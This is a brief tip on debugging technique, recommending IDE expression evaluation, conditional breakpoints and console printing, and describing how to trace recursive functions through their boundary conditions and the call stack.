When debugging, make good use of the IDE’s expression evaluation feature. Conditional breakpoints also help, and you can even print information directly to the console.
When you encounter a recursive function, first work out what the function does and find its boundary conditions, then go to the innermost recursion and use the stack to observe the parameters and data changes at each level.